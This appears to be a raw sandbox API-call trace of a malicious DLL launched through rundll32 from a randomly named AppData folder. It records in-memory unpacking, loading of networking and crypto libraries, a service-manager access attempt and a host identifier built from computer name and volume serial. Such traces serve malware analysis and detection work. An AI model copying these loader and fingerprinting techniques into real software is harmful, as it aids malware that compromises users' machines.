[0142.479] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x13c [0142.479] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0142.479] FindAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.479] malloc (_Size=0x4) returned 0x3a2a08 [0142.479] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaaaaaAaa") returned 0xc00c [0142.479] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x2cf2d0, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaaaaaAa") returned 0x3e [0142.479] ReleaseMutex (hMutex=0x13c) returned 1 [0142.480] CloseHandle (hObject=0x13c) returned 1 [0142.480] malloc (_Size=0x80) returned 0x3a2a18 [0142.480] strlen (_Str="idList_shmem") returned 0xc [0142.480] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x13c [0142.480] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0142.480] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.480] malloc (_Size=0x4) returned 0x3a2aa0 [0142.480] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAaAaaaa") returned 0xc00d [0142.480] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x2cf2d0, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAaAaaa") returned 0x3b [0142.480] ReleaseMutex (hMutex=0x13c) returned 1 [0142.480] CloseHandle (hObject=0x13c) returned 1 [0142.480] strlen (_Str="idListNextId_shmem") returned 0x12 [0142.480] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x13c [0142.480] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0142.481] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.481] malloc (_Size=0x4) returned 0x3a2ab0 [0142.481] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAaAAaaa") returned 0xc00e [0142.481] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x2cf2c0, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAaAAaa") returned 0x41 [0142.481] ReleaseMutex (hMutex=0x13c) returned 1 [0142.481] CloseHandle (hObject=0x13c) returned 1 [0142.481] GetCurrentThreadId () returned 0xe24 [0142.481] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0142.481] GetCurrentThreadId () returned 0xe24 [0142.481] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0142.481] GetCurrentProcess () returned 0xffffffff [0142.481] GetCurrentThread () returned 0xfffffffe [0142.481] GetCurrentProcess () returned 0xffffffff [0142.481] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3a2944, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3a2944*=0x140) returned 1 [0142.481] GetThreadPriority (hThread=0x140) returned 0 [0142.482] strlen (_Str="fc_key") returned 0x6 [0142.482] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x144 [0142.482] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0142.482] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.482] malloc (_Size=0x4) returned 0x3a2ac0 [0142.482] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaAAAaAaaaAaAaAaAAaaaaa") returned 0xc00f [0142.482] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x2cf350, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaAAAaAaaaAaAaAaAAaaaaa") returned 0x36 [0142.482] ReleaseMutex (hMutex=0x144) returned 1 [0142.482] CloseHandle (hObject=0x144) returned 1 [0142.482] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0142.482] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x144 [0142.482] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0142.482] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.482] malloc (_Size=0x4) returned 0x3a2ad0 [0142.483] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAAaAaaa") returned 0xc010 [0142.483] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x2cf310, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAAaAaa") returned 0x46 [0142.483] ReleaseMutex (hMutex=0x144) returned 1 [0142.483] CloseHandle (hObject=0x144) returned 1 [0142.483] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0142.483] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x144 [0142.483] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0142.483] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.483] malloc (_Size=0x4) returned 0x3a2ae0 [0142.483] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAAAaaaa") returned 0xc011 [0142.483] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x2cf2b0, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaAAAaAaaaAaAaAaAAAaaa") returned 0x48 [0142.483] ReleaseMutex (hMutex=0x144) returned 1 [0142.483] CloseHandle (hObject=0x144) returned 1 [0142.484] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0142.484] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x144 [0142.484] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0142.484] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.484] malloc (_Size=0x10) returned 0x3a2af0 [0142.484] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaAAAaAaaaAaAaAaAAAAaaa") returned 0xc012 [0142.484] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x2cf290, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaAAAaAaaaAaAaAaAAAAaa") returned 0x47 [0142.484] ReleaseMutex (hMutex=0x144) returned 1 [0142.484] CloseHandle (hObject=0x144) returned 1 [0142.484] calloc (_Count=0x1, _Size=0x20) returned 0x3a2b08 [0142.484] calloc (_Count=0x1, _Size=0x1c) returned 0x3a2b30 [0142.484] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x144 [0142.484] calloc (_Count=0x1, _Size=0x1c) returned 0x3a2b58 [0142.484] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x148 [0142.484] calloc (_Count=0x1, _Size=0x6c) returned 0x3a2b80 [0142.484] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x14c [0142.484] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x150 [0142.485] strlen (_Str="rwl_global_shmem") returned 0x10 [0142.485] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x154 [0142.485] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0142.485] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.485] malloc (_Size=0x10) returned 0x3a2bf8 [0142.485] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaAAAaAaaaAaAaAAAAAAAaa") returned 0xc013 [0142.485] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x2cf2b0, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaAAAaAaaaAaAaAAAAAAAa") returned 0x3f [0142.485] ReleaseMutex (hMutex=0x154) returned 1 [0142.485] CloseHandle (hObject=0x154) returned 1 [0142.485] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0142.485] GetCurrentThreadId () returned 0xe24 [0142.485] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0142.485] GetCurrentThreadId () returned 0xe24 [0142.485] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0142.486] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x154 [0142.486] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0142.486] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.486] malloc (_Size=0x4) returned 0x3a2c10 [0142.486] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaAAAaAaaaAaAAaaaaaAaaa") returned 0xc014 [0142.486] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x2cf310, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaAAAaAaaaAaAAaaaaaAaa") returned 0x45 [0142.486] ReleaseMutex (hMutex=0x154) returned 1 [0142.486] CloseHandle (hObject=0x154) returned 1 [0142.486] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0142.486] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x154 [0142.486] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0142.486] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.486] malloc (_Size=0x4) returned 0x3a2c20 [0142.486] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaAAAaAaaaAaAAaaaaAaaaa") returned 0xc015 [0142.486] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x2cf310, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaAAAaAaaaAaAAaaaaAaaa") returned 0x45 [0142.486] ReleaseMutex (hMutex=0x154) returned 1 [0142.486] CloseHandle (hObject=0x154) returned 1 [0142.487] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0142.487] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x154 [0142.487] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0142.487] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.487] malloc (_Size=0x4) returned 0x3a2c30 [0142.488] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaAAAaAaaaAaAAaaaaAAaaa") returned 0xc016 [0142.488] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x2cf310, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaAAAaAaaaAaAAaaaaAAaa") returned 0x46 [0142.488] ReleaseMutex (hMutex=0x154) returned 1 [0142.488] CloseHandle (hObject=0x154) returned 1 [0142.488] realloc (_Block=0x0, _Size=0x4) returned 0x3a2c58 [0142.488] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0142.488] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0142.488] ReleaseSemaphore (in: hSemaphore=0x138, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0142.488] CloseHandle (hObject=0x138) returned 1 [0142.489] free (_Block=0x3a2870) [0142.489] free (_Block=0x3a1490) [0142.489] GetLastError () returned 0x0 [0142.489] SetLastError (dwErrCode=0x0) [0142.489] GetLastError () returned 0x0 [0142.489] realloc (_Block=0x0, _Size=0x4) returned 0x3a2c68 [0142.489] realloc (_Block=0x0, _Size=0x1) returned 0x3a2c78 [0142.489] SetLastError (dwErrCode=0x0) [0142.489] GetNativeSystemInfo (in: lpSystemInfo=0x2cf4b8 | out: lpSystemInfo=0x2cf4b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0142.489] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x10000000 [0142.489] GetProcessHeap () returned 0x530000 [0142.490] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a7280 [0142.490] VirtualAlloc (lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0142.490] VirtualAlloc (lpAddress=0x10001000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000 [0142.493] VirtualAlloc (lpAddress=0x10024000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10024000 [0142.493] VirtualAlloc (lpAddress=0x10025000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10025000 [0142.493] VirtualAlloc (lpAddress=0x10026000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10026000 [0142.493] GetLastError () returned 0x0 [0142.493] SetLastError (dwErrCode=0x0) [0142.493] GetLastError () returned 0x0 [0142.494] SetLastError (dwErrCode=0x0) [0142.494] GetLastError () returned 0x0 [0142.500] SetLastError (dwErrCode=0x0) [0142.500] GetLastError () returned 0x0 [0142.500] SetLastError (dwErrCode=0x0) [0142.500] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2cf390 | out: lpflOldProtect=0x2cf390*=0x4) returned 1 [0142.506] GetLastError () returned 0x0 [0142.506] SetLastError (dwErrCode=0x0) [0142.506] GetLastError () returned 0x0 [0142.506] SetLastError (dwErrCode=0x0) [0142.506] GetLastError () returned 0x0 [0142.506] SetLastError (dwErrCode=0x0) [0142.506] VirtualProtect (in: lpAddress=0x10024000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2cf390 | out: lpflOldProtect=0x2cf390*=0x4) returned 1 [0142.507] GetLastError () returned 0x0 [0142.507] SetLastError (dwErrCode=0x0) [0142.507] GetLastError () returned 0x0 [0142.507] SetLastError (dwErrCode=0x0) [0142.507] GetLastError () returned 0x0 [0142.507] SetLastError (dwErrCode=0x0) [0142.507] VirtualProtect (in: lpAddress=0x10025000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x2cf390 | out: lpflOldProtect=0x2cf390*=0x4) returned 1 [0142.507] GetLastError () returned 0x0 [0142.507] SetLastError (dwErrCode=0x0) [0142.507] GetLastError () returned 0x0 [0142.507] SetLastError (dwErrCode=0x0) [0142.507] GetLastError () returned 0x0 [0142.507] SetLastError (dwErrCode=0x0) [0142.507] VirtualFree (lpAddress=0x10026000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0142.511] GetLastError () returned 0x0 [0142.511] SetLastError (dwErrCode=0x0) [0142.511] GetLastError () returned 0x0 [0142.511] SetLastError (dwErrCode=0x0) [0142.512] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer" [0142.512] GetProcessHeap () returned 0x530000 [0142.512] GetModuleHandleA (lpModuleName="NTDLL") returned 0x779e0000 [0142.513] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28) returned 0x5b29f8 [0142.513] lstrcmpiW (lpString1="DllRegisterServer", lpString2="DllRegisterServer") returned 0 [0142.515] GetProcessHeap () returned 0x530000 [0142.515] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5b29f8 | out: hHeap=0x530000) returned 1 [0142.515] GetLastError () returned 0x0 [0142.515] SetLastError (dwErrCode=0x0) [0142.569] DllRegisterServer () [0142.569] GetProcessHeap () returned 0x530000 [0142.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ac080 [0142.569] GetProcessHeap () returned 0x530000 [0142.569] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x5b4460 [0142.569] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76c20000 [0142.569] GetProcessHeap () returned 0x530000 [0142.570] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5b4460 | out: hHeap=0x530000) returned 1 [0142.570] GetProcessHeap () returned 0x530000 [0142.570] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.570] LoadLibraryW (lpLibFileName="bcrypt.dll") returned 0x67df0000 [0142.575] GetProcessHeap () returned 0x530000 [0142.575] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.575] GetProcessHeap () returned 0x530000 [0142.575] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.575] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x75650000 [0142.583] GetProcessHeap () returned 0x530000 [0142.583] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.583] GetProcessHeap () returned 0x530000 [0142.583] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.583] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x75cb0000 [0142.583] GetProcessHeap () returned 0x530000 [0142.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.584] GetProcessHeap () returned 0x530000 [0142.584] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.584] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x771d0000 [0142.584] GetProcessHeap () returned 0x530000 [0142.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.584] GetProcessHeap () returned 0x530000 [0142.584] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.584] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x75a80000 [0142.613] GetProcessHeap () returned 0x530000 [0142.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.613] GetProcessHeap () returned 0x530000 [0142.613] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.613] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x72b60000 [0142.613] GetProcessHeap () returned 0x530000 [0142.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.613] GetProcessHeap () returned 0x530000 [0142.613] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584078 [0142.613] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x76d80000 [0142.613] GetProcessHeap () returned 0x530000 [0142.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584078 | out: hHeap=0x530000) returned 1 [0142.613] GetProcessHeap () returned 0x530000 [0142.613] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x592090 [0142.613] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x6fa20000 [0142.617] GetProcessHeap () returned 0x530000 [0142.618] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x592090 | out: hHeap=0x530000) returned 1 [0142.618] GetProcessHeap () returned 0x530000 [0142.618] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x551cb0 [0142.618] GetProcessHeap () returned 0x530000 [0142.618] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d4250 [0142.618] GetProcessHeap () returned 0x530000 [0142.618] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x5a44e0 [0142.618] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf7d8, pszAlgId="RNG", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x2cf7d8) returned 0x0 [0142.627] GetProcessHeap () returned 0x530000 [0142.627] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5a44e0 | out: hHeap=0x530000) returned 1 [0142.627] BCryptGenRandom (in: hAlgorithm=0x544088, pbBuffer=0x5d4250, cbBuffer=0x4000, dwFlags=0x0 | out: pbBuffer=0x5d4250) returned 0x0 [0142.628] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x544088, dwFlags=0x0 | out: hAlgorithm=0x544088) returned 0x0 [0142.628] GetProcessHeap () returned 0x530000 [0142.628] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x230) returned 0x544088 [0142.628] GetProcessHeap () returned 0x530000 [0142.628] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x440) returned 0x599ab0 [0142.628] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x0 [0142.667] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x599ce0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0142.676] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x2cf360, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr")) returned 0x36 [0142.676] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0142.677] lstrcpyW (in: lpString1=0x599acc, lpString2="Oxeedtbi\\tfnfdhfu.kqr" | out: lpString1="Oxeedtbi\\tfnfdhfu.kqr") returned="Oxeedtbi\\tfnfdhfu.kqr" [0142.677] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x2cf5d4, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr")) returned 0x36 [0142.677] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer" [0142.677] CommandLineToArgvW (in: lpCmdLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer", pNumArgs=0x2cf7c0 | out: pNumArgs=0x2cf7c0) returned 0x5ada28*="C:\\Windows\\SysWOW64\\rundll32.exe" [0142.678] LocalFree (hMem=0x5ada28) returned 0x0 [0142.678] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x2cf5d0, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr")) returned 0x36 [0142.678] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr"), dwDesiredAccess=0x80, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0142.678] GetFileInformationByHandleEx (in: hFile=0x1a8, FileInformationClass=0x0, lpFileInformation=0x2cf5a8, dwBufferSize=0x28 | out: lpFileInformation=0x2cf5a8) returned 1 [0142.678] CloseHandle (hObject=0x1a8) returned 1 [0142.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf5a0 | out: lpSystemTimeAsFileTime=0x2cf5a0*(dwLowDateTime=0x907ee160, dwHighDateTime=0x1d806e7)) [0142.679] GetProcessHeap () returned 0x530000 [0142.679] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x134) returned 0x598bb8 [0142.679] GetComputerNameA (in: lpBuffer=0x2cf710, nSize=0x2cf704 | out: lpBuffer="Q9IATRKPRH", nSize=0x2cf704) returned 1 [0142.682] GetProcessHeap () returned 0x530000 [0142.683] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x5a44e0 [0142.683] GetWindowsDirectoryW (in: lpBuffer=0x2cf450, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0142.683] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x2cf668, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2cf668*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.686] _snprintf (in: _Dest=0x598bd4, _Count=0x104, _Format="%s_%08X" | out: _Dest="Q9IATRKPRH_8443A5AF") returned 19 [0142.686] GetProcessHeap () returned 0x530000 [0142.686] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5a44e0 | out: hHeap=0x530000) returned 1 [0142.686] GetProcessHeap () returned 0x530000 [0142.686] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1c) returned 0x5923b0 [0142.686] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1a8 [0142.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1000add9, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x551c10 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x551bc0 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4c) returned 0x5d3c08 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x128) returned 0x5d2710 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b168 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] 